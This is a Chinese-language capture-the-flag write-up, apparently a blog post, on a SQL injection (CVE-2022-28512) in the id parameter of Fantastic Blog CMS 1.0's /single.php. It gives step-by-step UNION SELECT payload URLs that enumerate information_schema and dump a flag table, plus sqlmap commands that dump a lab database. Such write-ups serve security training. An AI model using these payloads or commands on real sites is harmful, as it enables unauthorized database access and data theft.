Fantastic Blog CMS SQL注入漏洞(CVE-2022-28512)
0x01 靶场介绍
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
0x02 影响版本
Fantastic Blog CMS 1.0 版本
0x03 具体步骤
进入靶场,界面如下:
直接访问/single.php?id=1
按流程走,单引号闭合时出现错误回显
/single.php?id=2%27
order by 1页面显示正常,而order by 10时不正常,判断有10列
/single.php?id=2%27order%20by%2010--+
发现回显位2,4
/single.php?id=.2%27union%20select%201,2,3,4,5,6,7,8,9--+
当前数据库库名为ctf
继续查表名
/single.php?id=.2%27union%20select%201,2,3,group_concat(table_name),5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=%27ctf%27--+
发现有个表名flag,继续查列
/single.php?id=.2%27union%20select%201,2,3,group_concat(column_name),5,6,7,8,9%20from%20information_schema.columns%20where%20table_schema=%27ctf%27%20and%20table_name=%27flag%27--+
继续找flag
/single.php?id=.2%27union%20select%201,2,3,group_concat(flag),5,6,7,8,9%20from%20flag--+
成功找到flag
0x04 使用sqlmap
sqlmap -u "http://eci-2ze4m6m66jjj9up7zvkn.cloudeci1.ichunqiu.com/single.php?id=-2" --dbs
sqlmap -u "http://eci-2ze4m6m66jjj9up7zvkn.cloudeci1.ichunqiu.com/single.php?id=-2" -D ctf --tables
sqlmap -u "http://eci-2ze4m6m66jjj9up7zvkn.cloudeci1.ichunqiu.com/single.php?id=-2" -D ctf -T flag --dump
0x05 总结
平平无奇的一场注入,没有任何屏蔽,不需要考虑绕过,典型的SQL注入流程。
标签:Fantastic,2%,Blog,漏洞,single,SQL,php,CMS,id From: https://www.cnblogs.com/0dot7/p/17220431.html